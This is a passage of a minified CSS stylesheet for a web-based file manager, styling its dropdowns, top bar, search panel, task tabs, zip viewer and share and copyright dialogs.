rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header .s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 